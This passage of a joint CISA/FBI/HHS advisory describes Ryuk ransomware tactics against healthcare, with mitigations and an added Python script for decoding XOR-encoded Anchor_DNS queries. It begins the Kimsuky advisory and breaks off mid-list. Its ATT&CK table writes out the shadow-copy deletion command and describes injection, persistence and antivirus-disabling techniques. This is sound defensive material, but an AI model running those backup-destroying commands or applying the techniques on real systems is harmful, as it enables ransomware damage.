<p>Ryuk actors will quickly map the network in order to enumerate the environment and understand the scope of the infection. In order to limit suspicious activity and possible detection, the actors choose to live off the land and, if possible, use native tools—such as net view, net computers, and ping—to locate mapped network shares, domain controllers, and Active Directory. In order to move laterally throughout the network, the group relies on native tools, such as PowerShell, Windows Management Instrumentation (WMI), Windows Remote Management, and Remote Desktop Protocol (RDP). The group also uses third-party tools, such as Bloodhound.</p>

<p>Once dropped, Ryuk uses AES-256 to encrypt files and an RSA public key to encrypt the AES key. The Ryuk dropper drops a <code>.bat</code> file that attempts to delete all backup files and Volume Shadow Copies (automatic backup snapshots made by Windows), preventing the victim from recovering encrypted files without the decryption program.</p>

<p>In addition, the attackers will attempt to shut down or uninstall security applications on the victim systems that might prevent the ransomware from executing. Normally this is done via a script, but if that fails, the attackers are capable of manually removing the applications that could stop the attack. The <code>RyukReadMe</code> file placed on the system after encryption provides either one or two email addresses, using the end-to-end encrypted email provider Protonmail, through which the victim can contact the attacker(s). While earlier versions provide a ransom amount in the initial notifications, Ryuk users are now designating a ransom amount only after the victim makes contact.</p>

<p>The victim is told how much to pay to a specified Bitcoin wallet for the decryptor and is provided a sample decryption of two files.</p>

<p>Initial testing indicates that the <code>RyukReadMe</code> file does not need to be present for the decryption script to run successfully but other reporting advises some files will not decrypt properly without it. Even if run correctly, there is no guarantee the decryptor will be effective. This is further complicated because the <code>RyukReadMe</code> file is deleted when the script is finished. This may affect the decryption script unless it is saved and stored in a different location before running.</p>

<p>According to MITRE, <a href=”https://attack.mitre.org/versions/v7/software/S0446/”>Ryuk</a> uses the ATT&amp;CK techniques listed in table 1.</p>

<p class=”text-align-center”><em>Table 1: Ryuk ATT&amp;CK techniques</em></p>

<table border=”1″ cellpadding=”1″ cellspacing=”1″ class=”general-table” style=”width: 881.46px; height: 312px; margin-right: auto; margin-left: auto;”>
<thead>
<tr>
<th scope=”col” style=”width: 198px;”><strong>Technique</strong></th>
<th scope=”col” style=”width: 356px;”><strong>Use</strong></th>
</tr>
</thead>
<tbody>
<tr>
<td scope=”col” style=”width: 198px; text-align: left;”>System Network Configuration Discovery [<a href=”https://attack.mitre.org/versions/v7/techniques/T1016/”>T1016</a>]</td>
<td scope=”col” style=”width: 356px; text-align: left;”>Ryuk has called <code>GetIpNetTable</code> in an attempt to identify all mounted drives and hosts that have Address Resolution Protocol entries.&nbsp;</td>
</tr>
<tr>
<td scope=”col” style=”width: 198px; text-align: left;”>
<p>Masquerading: Match Legitimate Name or Location [<a href=”https://attack.mitre.org/versions/v7/techniques/T1036/005/”>T1036.005</a>]</p>
</td>
<td scope=”col” style=”width: 356px; text-align: left;”>Ryuk has constructed legitimate appearing installation folder paths by calling <code>GetWindowsDirectoryW</code> and then inserting a null byte at the fourth character of the path. For Windows Vista or higher, the path would appear as <code>C:\Users\Public</code>.&nbsp;</td>
</tr>
<tr>
<td scope=”col” style=”width: 198px; text-align: left;”>Process Injection [<a href=”https://attack.mitre.org/versions/v7/techniques/T1055/”>T1055</a>]</td>
<td scope=”col” style=”width: 356px; text-align: left;”>Ryuk has injected itself into remote processes to encrypt files using a combination of <code>VirtualAlloc</code>, <code>WriteProcessMemory</code>, and <code>CreateRemoteThread</code>.&nbsp;</td>
</tr>
<tr>
<td scope=”col” style=”width: 198px; text-align: left;”>Process Discovery [<a href=”https://attack.mitre.org/versions/v7/techniques/T1057/”>T1057</a>]</td>
<td scope=”col” style=”width: 356px; text-align: left;”>Ryuk has called <code>CreateToolhelp32Snapshot</code> to enumerate all running processes.&nbsp;</td>
</tr>
<tr>
<td scope=”col” style=”width: 198px; text-align: left;”>Command and Scripting Interpreter: Windows Command Shell [<a href=”https://attack.mitre.org/versions/v7/techniques/T1059/003/”>T1059.003</a>]</td>
<td scope=”col” style=”width: 356px; text-align: left;”>Ryuk has used <code>cmd.exe</code> to create a Registry entry to establish persistence.&nbsp;</td>
</tr>
<tr>
<td scope=”col” style=”width: 198px; text-align: left;”>File and Directory Discovery [<a href=”https://attack.mitre.org/versions/v7/techniques/T1083/”>T1083</a>]</td>
<td scope=”col” style=”width: 356px; text-align: left;”>Ryuk has called <code>GetLogicalDrives</code> to enumerate all mounted drives, and <code>GetDriveTypeW</code> to determine the drive type.</td>
</tr>
<tr>
<td scope=”col” style=”width: 198px; text-align: left;”>Native API [<a href=”https://attack.mitre.org/versions/v7/techniques/T1106/”>T1106</a>]</td>
<td scope=”col” style=”width: 356px; text-align: left;”>Ryuk has used multiple native APIs including <code>ShellExecuteW</code> to run executables;&nbsp;<code>GetWindowsDirectoryW</code> to create folders; and <code>VirtualAlloc</code>, <code>WriteProcessMemory</code>, and <code>CreateRemoteThread</code> for process injection.&nbsp;</td>
</tr>
<tr>
<td scope=”col” style=”width: 198px; text-align: left;”>Access Token Manipulation [<a href=”https://attack.mitre.org/versions/v7/techniques/T1134/”>T1134</a>]</td>
<td scope=”col” style=”width: 356px; text-align: left;”>Ryuk has attempted to adjust its token privileges to have the <code>SeDebugPrivilege</code>.&nbsp;</td>
</tr>
<tr>
<td scope=”col” style=”width: 198px; text-align: left;”>Data Encrypted for Impact [<a href=”https://attack.mitre.org/versions/v7/techniques/T1486/”>T1486</a>]</td>
<td scope=”col” style=”width: 356px; text-align: left;”>Ryuk has used a combination of symmetric and asymmetric encryption to encrypt files. Files have been encrypted with their own AES key and given a file extension of <code>.RYK</code>. Encrypted directories have had a ransom note of <code>RyukReadMe.txt</code> written to the directory.&nbsp;</td>
</tr>
<tr>
<td scope=”col” style=”width: 198px; text-align: left;”>Service Stop [<a href=”https://attack.mitre.org/versions/v7/techniques/T1489/”>T1489</a>]</td>
<td scope=”col” style=”width: 356px; text-align: left;”>Ryuk has called <code>kill.bat</code> for stopping services, disabling services and killing processes.&nbsp;</td>
</tr>
<tr>
<td scope=”col” style=”width: 198px; text-align: left;”>Inhibit System Recovery [<a href=”https://attack.mitre.org/versions/v7/techniques/T1490/”>T1490</a>]</td>
<td scope=”col” style=”width: 356px; text-align: left;”>Ryuk has used <code>vssadmin Delete Shadows /all /quiet</code> to delete volume shadow copies and <code>vssadmin resize shadowstorage</code> to force deletion of shadow copies created by third-party applications.&nbsp;</td>
</tr>
<tr>
<td scope=”col” style=”width: 198px; text-align: left;”>Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder [<a href=”https://attack.mitre.org/versions/v7/techniques/T1547/001/”>T1547.001</a>]</td>
<td scope=”col” style=”width: 356px; text-align: left;”>Ryuk has used the Windows command line to create a Registry entry under <code>HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run</code> to establish persistence.</td>
</tr>
<tr>
<td scope=”col” style=”width: 198px; text-align: left;”>Impair Defenses: Disable or Modify Tools [<a href=”https://attack.mitre.org/versions/v7/techniques/T1562/001/”>T1562.001</a>]</td>
<td scope=”col” style=”width: 356px; text-align: left;”>Ryuk has stopped services related to anti-virus.</td>
</tr>
</tbody>
</table>
<h3>Mitigations</h3><p>For a downloadable copy of IOCs, see <a href=”https://us-cert.cisa.gov/sites/default/files/publications/AA20-302A.stix.xml”>AA20-302A.stix</a>. For additional IOCs detailing this activity, see <a href=”https://gist.github.com/aaronst/6aa7f61246f53a8dd4befea86e832456″>https://gist.github.com/aaronst/6aa7f61246f53a8dd4befea86e832456</a>.</p>

<h4>Plans and Policies</h4>

<p>CISA, FBI, and HHS encourage HPH Sector organizations to maintain business continuity plans—the practice of executing essential functions through emergencies (e.g., cyberattacks)—to minimize service interruptions. Without planning, provision, and implementation of continuity principles, organizations may be unable to continue operations. Evaluating continuity and capability will help identify continuity gaps. Through identifying and addressing these gaps, organizations can establish a viable continuity program that will help keep them functioning during cyberattacks or other emergencies. CISA, FBI, and HHS suggest HPH Sector organizations review or establish patching plans, security policies, user agreements, and business continuity plans to ensure they address current threats posed by malicious cyber actors.</p>

<h4>Network Best Practices</h4>

<ul>
<li>Patch operating systems, software, and firmware as soon as manufacturers release updates.</li>
<li>Check configurations for every operating system version for HPH organization-owned assets to prevent issues from arising that local users are unable to fix due to having local administration disabled.</li>
<li>Regularly change passwords to network systems and accounts and avoid reusing passwords for different accounts.</li>
<li>Use multi-factor authentication where possible.</li>
<li>Disable unused remote access/Remote Desktop Protocol (RDP) ports and monitor remote access/RDP logs.</li>
<li>Implement application and remote access allow listing to only allow systems to execute programs known and permitted by the established security policy.</li>
<li>Audit user accounts with administrative privileges and configure access controls with least privilege in mind.</li>
<li>Audit logs to ensure new accounts are legitimate.</li>
<li>Scan for open or listening ports and mediate those that are not needed.</li>
<li>Identify critical assets such as patient database servers, medical records, and telehealth and telework infrastructure; create backups of these systems and house the backups offline from the network.</li>
<li>Implement network segmentation. Sensitive data should not reside on the same server and network segment as the email environment.</li>
<li>Set antivirus and anti-malware solutions to automatically update; conduct regular scans.</li>
</ul>

<h4>Ransomware Best Practices</h4>

<p>CISA, FBI and HHS do not recommend paying ransoms. Payment does not guarantee files will be recovered. It may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. In addition to implementing the above network best practices, the FBI, CISA and HHS also recommend the following:</p>

<ul>
<li>Regularly back up data, air gap, and password protect backup copies offline.</li>
<li>Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, secure location.</li>
</ul>

<h4>User Awareness Best Practices</h4>

<ul>
<li>Focus on awareness and training. Because end users are targeted, make employees and stakeholders aware of the threats—such as ransomware and phishing scams—and how they are delivered. Additionally, provide users training on information security principles and techniques as well as overall emerging cybersecurity risks and vulnerabilities.</li>
<li>Ensure that employees know who to contact when they see suspicious activity or when they believe they have been a victim of a cyberattack. This will ensure that the proper established mitigation strategy can be employed quickly and efficiently.</li>
</ul>

<h4>Recommended Mitigation Measures</h4>

<p>System administrators who have indicators of a TrickBot network compromise should immediately take steps to back up and secure sensitive or proprietary data. TrickBot infections may be indicators of an imminent ransomware attack; system administrators should take steps to secure network devices accordingly. Upon evidence of a TrickBot infection, review DNS logs and use the <code>XOR</code> key of <code>0xB9</code> to decode <code>XOR</code> encoded DNS requests to reveal the presence of <code>Anchor_DNS</code>, and maintain and provide relevant logs.</p>
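<p>The DNS log review described above can be scripted. The following is an added example, not code from the advisory: it applies the <code>0xB9</code> key to DNS query names and reports those that decode to the <code>Anchor_DNS</code> string. The log line layout, the hex encoding of the payload inside query labels, and all sample names are assumptions made for the illustration.</p>

```python
import re

XOR_KEY = 0xB9          # single-byte key given in the advisory
MARKER = b"anchor_dns"  # string the advisory says decoding reveals (matched case-insensitively)
HEX_LABEL = re.compile(r"(?:[0-9a-fA-F]{2})+")


def xor_bytes(data, key=XOR_KEY):
    """XOR every byte with the key; applying it twice restores the input."""
    return bytes(b ^ key for b in data)


def hex_runs(qname):
    """Yield the bytes of each run of consecutive hex-looking labels.

    Assumption: the XOR-encoded payload is carried as hex text, possibly
    split over several labels because one DNS label holds at most 63 bytes.
    """
    run = []
    for label in qname.rstrip(".").split(".") + [""]:  # "" flushes the last run
        if label and HEX_LABEL.fullmatch(label):
            run.append(label)
        else:
            if run:
                yield bytes.fromhex("".join(run))
            run = []


def decode_qname(qname):
    """Return the decoded text if the query name hides the marker, else None."""
    for blob in hex_runs(qname):
        plain = xor_bytes(blob)
        if MARKER in plain.lower():
            return plain.decode("latin-1")
    return None


def scan(log_text):
    """Scan 'timestamp client qname qtype' lines and return the hits."""
    hits = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) != 4:  # skip blank or malformed lines
            continue
        ts, client, qname, _qtype = fields
        decoded = decode_qname(qname)
        if decoded is not None:
            hits.append({"time": ts, "client": client,
                         "qname": qname, "decoded": decoded})
    return hits


# Constructed sample data: payloads are built here, not taken from real traffic.
_P1 = xor_bytes(b"/Anchor_DNS/WKSTN-07/").hex()
_P2 = xor_bytes(b"/anchor_dns/LAB-PC/").hex()
SAMPLE_LOG = f"""\
2020-10-29T12:00:01Z 10.0.0.23 www.example.test A
2020-10-29T12:00:04Z 10.0.0.57 {_P1[:12]}.{_P1[12:]}.zone.example.test A
2020-10-29T12:00:09Z 10.0.0.23 deadbeef.cafe.example.test TXT
2020-10-29T12:00:15Z 10.0.0.61 {_P2}.zone.example.test A
malformed line
"""

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["time"], hit["client"], hit["qname"], "->", hit["decoded"])
```

<p>Hits identify the querying client, which is the host to isolate and whose logs should be preserved.</p>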

<h3>GENERAL RANSOMWARE MITIGATIONS — HPH SECTOR</h3>

<p>This section is based on CISA and Multi-State Information Sharing and Analysis Center (MS-ISAC)’s Joint Ransomware Guide, which can be found at <a href=”https://www.cisa.gov/publication/ransomware-guide”>https://www.cisa.gov/publication/ransomware-guide</a>.</p>

<p>CISA, FBI, and HHS recommend that healthcare organizations implement both ransomware prevention and ransomware response measures immediately.</p>

<h4>Ransomware Prevention</h4>

<h4><em>Join and Engage with Cybersecurity Organizations</em></h4>

<p>CISA, FBI, and HHS recommend that healthcare organizations take the following initial steps:</p>

<ul>
<li>Join a healthcare information sharing organization, H-ISAC:
<ul>
<li>Health Information Sharing and Analysis Center (H-ISAC): <a href=”https://h-isac.org/membership-account/join-h-isac/”>https://h-isac.org/membership-account/join-h-isac/</a></li>
<li>Sector-based ISACs – National Council of ISACs: <a href=”https://www.nationalisacs.org/member-isacs”>https://www.nationalisacs.org/member-isacs</a></li>
<li>Information Sharing and Analysis Organization (ISAO) Standards Organization: <a href=”https://www.isao.org/information-sharing-groups/”>https://www.isao.org/information-sharing-groups/</a></li>
</ul>
</li>
<li>Engage with CISA and FBI, as well as HHS—through the HHS Health Sector Cybersecurity Coordination Center (HC3)—to build a lasting partnership and collaborate on information sharing, best practices, assessments, and exercises.
<ul>
<li>CISA: <a href=”https://cisa.gov”>cisa.gov</a>, <a href=”https://us-cert.cisa.gov/mailing-lists-and-feeds”>https://us-cert.cisa.gov/mailing-lists-and-feeds</a>, <a href=”mailto:central@cisa.gov”>central@cisa.gov</a></li>
<li>FBI: <a href=”https://ic3.gov”>ic3.gov</a>, <a href=”https://www.fbi.gov/contact-us/field”>www.fbi.gov/contact-us/field</a>, <a href=”mailto:CyWatch@fbi.gov”>CyWatch@fbi.gov</a></li>
<li>HHS/HC3: <a href=”http://www.hhs.gov/hc3”>http://www.hhs.gov/hc3</a>, <a href=”mailto:HC3@HHS.gov”>HC3@HHS.gov</a></li>
</ul>
</li>
</ul>

<p>Engaging with the H-ISAC, ISAO, CISA, FBI, and HHS/HC3 will enable your organization to receive critical information and access to services to better manage the risk posed by ransomware and other cyber threats.</p>

<h4><em>Follow Ransomware Best Practices</em></h4>

<p>Refer to the best practices and references below to help manage the risk posed by ransomware and support your organization’s coordinated and efficient response to a ransomware incident. Apply these practices to the greatest extent possible based on availability of organizational resources.</p>

<ul>
<li>It is critical to maintain offline, encrypted backups of data and to regularly test your backups. Backup procedures should be conducted on a regular basis. It is important that backups be maintained offline or in separated networks as many ransomware variants attempt to find and delete any accessible backups. Maintaining offline, current backups is most critical because there is no need to pay a ransom for data that is readily accessible to your organization.
<ul>
<li>Use the 3-2-1 rule as a guideline for backup practices. The rule states that three copies of all critical data are retained on at least two different types of media and at least one of them is stored offline.</li>
<li>Maintain regularly updated “gold images” of critical systems in the event they need to be rebuilt. This entails maintaining image “templates” that include a preconfigured operating system (OS) and associated software applications that can be quickly deployed to rebuild a system, such as a virtual machine or server.</li>
<li>Retain backup hardware to rebuild systems in the event rebuilding the primary system is not preferred.
<ul>
<li>Hardware that is newer or older than the primary system can present installation or compatibility hurdles when rebuilding from images.</li>
<li>Ensure all backup hardware is properly patched.</li>
</ul>
</li>
</ul>
</li>
<li>In addition to system images, applicable source code or executables should be available (stored with backups, escrowed, license agreement to obtain, etc.). It is more efficient to rebuild from system images, but some images will not install on different hardware or platforms correctly; having separate access to needed software will help in these cases.</li>
<li>Create, maintain, and exercise a basic cyber incident response plan and associated communications plan that includes response and notification procedures for a ransomware incident.
<ul>
<li>Review available incident response guidance, such as CISA’s Technical Approaches to Uncovering and Remediating Malicious Activity&nbsp;<a href=”https://us-cert.cisa.gov/ncas/alerts/aa20-245a”>https://us-cert.cisa.gov/ncas/alerts/aa20-245a</a>.</li>
</ul>
</li>
<li>Help your organization better organize around cyber incident response.</li>
<li>Develop a cyber incident response plan.</li>
<li>The Ransomware Response Checklist, available in the <a href=”https://www.cisa.gov/publication/ransomware-guide”>CISA and MS-ISAC Joint Ransomware Guide</a>, serves as an adaptable, ransomware-specific annex to organizational cyber incident response or disruption plans.</li>
<li>Review and implement as applicable MITRE’s Medical Device Cybersecurity: Regional Incident Preparedness and Response Playbook (<a href=”https://www.mitre.org/sites/default/files/publications/pr-18-1550-Medical-Device-Cybersecurity-Playbook.pdf”>https://www.mitre.org/sites/default/files/publications/pr-18-1550-Medical-Device-Cybersecurity-Playbook.pdf</a>).</li>
<li>Develop a risk management plan that maps critical health services and care to the necessary information systems; this will ensure that the incident response plan will contain the proper triage procedures.</li>
<li>Plan for the possibility of critical information systems being inaccessible for an extended period of time. This should include but not be limited to the following:
<ul>
<li>Print and properly store/protect hard copies of digital information that would be required for critical patient healthcare.</li>
<li>Plan for and periodically train staff to handle the re-routing of incoming/existing patients in an expedient manner if information systems were to abruptly and unexpectedly become unavailable.</li>
<li>Coordinate the potential for surge support with other healthcare facilities in the greater local area. This should include organizational leadership periodically meeting and collaborating with counterparts in the greater local area to create/update plans for their facilities to both abruptly send and receive a significant amount of critical patients for immediate care. This may include the opportunity to re-route healthcare employees (and possibly some equipment) to provide care along with additional patients.</li>
</ul>
</li>
<li>Consider the development of a second, air-gapped communications network that can provide a minimum standard of backup support for hospital operations if/when the primary network becomes unavailable.</li>
<li>Predefine network segments, IT capabilities and other functionality that can either be quickly separated from the greater network or shut down entirely without impacting operations of the rest of the IT infrastructure.</li>
<li>Legacy devices should be identified and inventoried with highest priority and given special consideration during a ransomware event.</li>
<li>See <a href=”https://www.cisa.gov/publication/ransomware-guide”>CISA and MS-ISAC’s Joint Ransomware Guide</a> for infection vectors including internet-facing vulnerabilities and misconfigurations; phishing; precursor malware infection; and third parties and managed service providers.</li>
<li>HHS/HC3 tracks ransomware that is targeting the HPH Sector; this information can be found at <a href=”http://www.hhs.gov/hc3”>http://www.hhs.gov/hc3</a>.</li>
</ul>

<h4><em>Hardening Guidance</em></h4>

<ul>
<li>The Food and Drug Administration provides multiple guidance documents regarding the hardening of healthcare and specifically medical devices found here: <a href=”https://www.fda.gov/medical-devices/digital-health-center-excellence/cybersecurity”>https://www.fda.gov/medical-devices/digital-health-center-excellence/cybersecurity</a>.</li>
<li>See <a href=”https://www.cisa.gov/publication/ransomware-guide”>CISA and MS-ISAC’s Joint Ransomware Guide</a> for additional in-depth hardening guidance.</li>
</ul>

<h4><em>Contact CISA for These No-Cost Resources</em></h4>

<ul>
<li>Information sharing with CISA and MS-ISAC (for SLTT organizations) includes bi-directional sharing of best practices and network defense information regarding ransomware trends and variants as well as malware that is a precursor to ransomware.</li>
<li>Policy-oriented or technical assessments help organizations understand how they can improve their defenses to avoid ransomware infection: <a href=”https://www.cisa.gov/cyber-resource-hub”>https://www.cisa.gov/cyber-resource-hub</a>.
<ul>
<li>Assessments include Vulnerability Scanning and Phishing Campaign Assessment.</li>
</ul>
</li>
<li>Cyber exercises evaluate or help develop a cyber incident response plan in the context of a ransomware incident scenario.</li>
<li>CISA Cybersecurity Advisors (CSAs) advise on best practices and connect you with CISA resources to manage cyber risk.</li>
<li>Contacts:
<ul>
<li>SLTT organizations: <a href=”mailto:CyberLiaison_SLTT@cisa.dhs.gov”>CyberLiaison_SLTT@cisa.dhs.gov</a></li>
<li>Private sector organizations: <a href=”mailto:CyberLiaison_Industry@cisa.dhs.gov”>CyberLiaison_Industry@cisa.dhs.gov</a></li>
</ul>
</li>
</ul>

<h4><em>Ransomware Quick References</em></h4>

<ul>
<li><em>Ransomware: What It Is and What to Do About It</em> (CISA): General ransomware guidance for organizational leadership and more in-depth information for CISOs and technical staff: <a href=”https://www.us-cert.cisa.gov/sites/default/files/publications/Ransomware_Executive_One-Pager_and_Technical_Document-FINAL.pdf”>https://www.us-cert.cisa.gov/sites/default/files/publications/Ransomware_Executive_One-Pager_and_Technical_Document-FINAL.pdf</a></li>
<li>Ransomware (CISA): Introduction to ransomware, notable links to CISA products on protecting networks, specific ransomware threats, and other resources: <a href=”https://www.us-cert.cisa.gov/Ransomware”>https://www.us-cert.cisa.gov/Ransomware</a></li>
<li>HHS/HC3: Ransomware that impacts HPH is tracked by the HC3 and can be found at <a href=”http://www.hhs.gov/hc3”>www.hhs.gov/hc3</a></li>
<li><em>Security Primer – Ransomware</em> (MS-ISAC): Outlines opportunistic and strategic ransomware campaigns, common infection vectors, and best practice recommendations: <a href=”https://www.cisecurity.org/white-papers/security-primer-ransomware/”>https://www.cisecurity.org/white-papers/security-primer-ransomware/</a></li>
<li><em>Ransomware: Facts, Threats, and Countermeasures</em> (MS-ISAC): Facts about ransomware, infection vectors, ransomware capabilities, and how to mitigate the risk of ransomware infection: <a href=”https://www.cisecurity.org/blog/ransomware-facts-threats-and-countermeasures/”>https://www.cisecurity.org/blog/ransomware-facts-threats-and-countermeasures/</a></li>
<li>HHS Ransomware Fact Sheet: <a href=”https://www.hhs.gov/sites/default/files/RansomwareFactSheet.pdf”>https://www.hhs.gov/sites/default/files/RansomwareFactSheet.pdf</a></li>
<li>NIST Securing Data Integrity White Paper: <a href=”https://csrc.nist.gov/publications/detail/white-paper/2020/10/01/securing-data-integrity-against-ransomware-attacks/draft”>https://csrc.nist.gov/publications/detail/white-paper/2020/10/01/securing-data-integrity-against-ransomware-attacks/draft</a></li>
</ul>

<h4>Ransomware Response Checklist</h4>

<p><strong>Remember: Paying the ransom will not ensure your data is decrypted or that your systems or data will no longer be compromised. CISA, FBI, and HHS do not recommend paying ransom.</strong></p>

<p>Should your organization be a victim of ransomware, CISA strongly recommends responding by using the Ransomware Response Checklist located in <a href=”https://www.cisa.gov/publication/ransomware-guide”>CISA and MS-ISAC’s Joint Ransomware Guide</a>, which contains steps for detection and analysis as well as containment and eradication.</p>

<h4><em>Consider the Need For Extended Identification or Analysis</em></h4>

<p>If extended identification or analysis is needed, CISA, HHS/HC3, or federal law enforcement may be interested in any of the following information that your organization determines it can legally share:</p>

<ul>
<li>Recovered executable file</li>
<li>Copies of the readme file – DO NOT REMOVE the file or decryption may not be possible</li>
<li>Live memory (RAM) capture from systems with additional signs of compromise (use of exploit toolkits, RDP activity, additional files found locally)</li>
<li>Images of infected systems with additional signs of compromise (use of exploit toolkits, RDP activity, additional files found locally)</li>
<li>Malware samples</li>
<li>Names of any other malware identified on your system</li>
<li>Encrypted file samples</li>
<li>Log files (Windows Event Logs from compromised systems, Firewall logs, etc.)</li>
<li>Any PowerShell scripts found having executed on the systems</li>
<li>Any user accounts created in Active Directory or machines added to the network during the exploitation</li>
<li>Email addresses used by the attackers and any associated phishing emails</li>
<li>A copy of the ransom note</li>
<li>Ransom amount and whether or not the ransom was paid</li>
<li>Bitcoin wallets used by the attackers</li>
<li>Bitcoin wallets used to pay the ransom (if applicable)</li>
<li>Copies of any communications with attackers</li>
</ul>

<p>Upon voluntary request, CISA can assist with analysis (e.g., phishing emails, storage media, logs, malware) at no cost to support your organization in understanding the root cause of an incident, even in the event additional remote assistance is not requested.</p>

<ul>
<li>CISA – Advanced Malware Analysis Center: <a href=”https://www.malware.us-cert.gov/MalwareSubmission/pages/submission.jsf”>https://www.malware.us-cert.gov/MalwareSubmission/pages/submission.jsf</a></li>
<li>Remote Assistance – Request via <a href=”mailto:Central@cisa.gov”>Central@cisa.gov</a></li>
</ul>
<h3>Contact Information</h3><p>CISA, FBI, and HHS recommend identifying and having on hand the following contact information for ready use should your organization become a victim of a ransomware incident. Consider contacting these organizations for mitigation and response assistance or for purposes of notification.</p>

<ul>
<li>State and Local Response Contacts</li>
<li>IT/IT Security Team – Centralized Cyber Incident Reporting</li>
<li>State and Local Law Enforcement</li>
<li>Fusion Center</li>
<li>Managed/Security Service Providers</li>
<li>Cyber Insurance</li>
</ul>

<p>To report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at <a href=”https://www.fbi.gov/contact-us/field-offices”>www.fbi.gov/contact-us/field</a>, or the FBI’s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by email at <a href=”mailto:CyWatch@fbi.gov”>CyWatch@fbi.gov</a>. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. To request incident response resources or technical assistance related to these threats, contact CISA at <a href=”mailto:Central@cisa.gov”>Central@cisa.gov</a>.</p>

<p>Additionally, see <a href=”https://www.cisa.gov/publication/ransomware-guide”>CISA and MS-ISAC’s Joint Ransomware Guide</a> for information on contacting—and what to expect from contacting—federal asset response and federal threat response contacts.</p>

<h3><em>Disclaimer</em></h3>

<p>This document is marked TLP:WHITE. Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the Traffic Light Protocol, see <a href=”https://cisa.gov/tlp”>https://cisa.gov/tlp</a>.</p>
<h3>Revisions</h3>
<ul> <li>October 28, 2020: Initial version</li> <li>October 29, 2020: Updated to include information on Conti, TrickBot, and BazarLoader, including new IOCs and Yara Rules for detection</li> <li>November 2, 2020: Updated FBI link</li> </ul>

AA20-301A: North Korean Advanced Persistent Threat Focus: Kimsuky

Original release date: October 27, 2020<br/><h3>Summary</h3><p class=”tip-intro” style=”font-size: 15px;”><em>This advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&amp;CK®) version 7 framework. See the <a href=”https://attack.mitre.org/versions/v7/techniques/enterprise/”>ATT&amp;CK for Enterprise version 7</a> for all referenced threat actor tactics and techniques.</em></p>

<p>This joint cybersecurity advisory was coauthored by the Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), and the U.S. Cyber Command Cyber National Mission Force (CNMF). This advisory describes the tactics, techniques, and procedures (TTPs) used by North Korean advanced persistent threat (APT) group <a href=”https://attack.mitre.org/groups/G0094/”>Kimsuky</a>—against worldwide targets—to gain intelligence on various topics of interest to the North Korean government. The U.S. Government refers to malicious cyber activity by the North Korean government as HIDDEN COBRA. For more information on HIDDEN COBRA activity, visit <a href=”https://us-cert.cisa.gov/northkorea”>https://www.us-cert.cisa.gov/northkorea</a>.</p>

<p>This advisory describes known Kimsuky TTPs, as found in open-source and intelligence reporting through July 2020. The target audience for this advisory is commercial sector businesses desiring to protect their networks from North Korean APT activity.</p>

<p><a href=”https://us-cert.cisa.gov/sites/default/files/publications/TLP-WHITE_AA20-301A_North_Korean_APT_Focus_Kimsuky.pdf”>Click here</a> for a PDF version of this report.</p>

<h4 style=”margin-top: 8px; margin-bottom: 8px;”>Key Findings</h4>

<p>This advisory’s key findings are:</p>

<ul>
<li>The Kimsuky APT group has most likely been operating since 2012.</li>
<li>Kimsuky is most likely tasked by the North Korean regime with a global intelligence gathering mission.</li>
<li>Kimsuky employs common social engineering tactics, spearphishing, and watering hole attacks to exfiltrate desired information from victims.[<a href=”https://www.netscout.com/blog/asert/stolen-pencil-campaign-targets-academia”>1</a>],[<a href=”https://cyware.com/news/babyshark-malware-continues-to-target-nuclear-and-cryptocurrency-industries-40e04829″>2</a>]</li>
<li>Kimsuky is most likely to use spearphishing to gain initial access into victim hosts or networks.[<a href=”https://cyware.com/news/babyshark-malware-continues-to-target-nuclear-and-cryptocurrency-industries-40e04829″>3</a>]</li>
<li>Kimsuky conducts its intelligence collection activities against individuals and organizations in South Korea, Japan, and the United States.</li>
<li>Kimsuky focuses its intelligence collection activities on foreign policy and national security issues related to the Korean peninsula, nuclear policy, and sanctions.</li>
<li>Kimsuky specifically targets:
<ul>
<li>Individuals identified as experts in various fields,</li>
<li>Think tanks, and</li>
<li>South Korean government entities.[<a href=”https://www.netscout.com/blog/asert/stolen-pencil-campaign-targets-academia”>4</a>],[<a href=”https://attack.mitre.org/groups/G0094/”>5</a>],[<a href=”https://www.securityweek.com/north-korea-suspected-cyber-espionage-attacks-against-south-korean-entities”>6</a>],[<a href=”https://attack.mitre.org/groups/G0094/”>7</a>],[<a href=”https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf”>8</a>]</li>
</ul>
</li>
<li>CISA, FBI, and CNMF recommend individuals and organizations within this target profile increase their defenses and adopt a heightened state of awareness. Particularly important mitigations include safeguards against spearphishing, use of multi-factor authentication, and user awareness training.</li>
</ul>
<h3>Technical Details</h3><h4>Initial Access</h4>

<p>Kimsuky uses various spearphishing and social engineering methods to obtain <em>Initial Access</em> [<a href=”https://attack.mitre.org/tactics/TA0001/”>TA0001</a>] to victim networks.[<a href=”https://blog.malwarebytes.com/threat-analysis/2020/04/apts-and-covid-19-how-advanced-persistent-threats-use-the-coronavirus-as-a-lure/”>9</a>],[<a href=”https://www.pwc.co.uk/issues/cyber-security-services/research/tracking-kimsuky-north-korea-based-cyber-espionage-group-part-2.html”>10</a>],[<a href=”https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf”>11</a>] Spearphishing—with a malicious attachment embedded in the email—is the most observed Kimsuky tactic (Phishing: Spearphishing Attachment [<a href=”https://attack.mitre.org/versions/v7/techniques/T1566/001/”>T1566.001</a>]).[<a href=”https://www.netscout.com/blog/asert/stolen-pencil-campaign-targets-academia”>12</a>],[<a href=”https://attack.mitre.org/groups/G0094/”>13</a>]</p>

<ul>
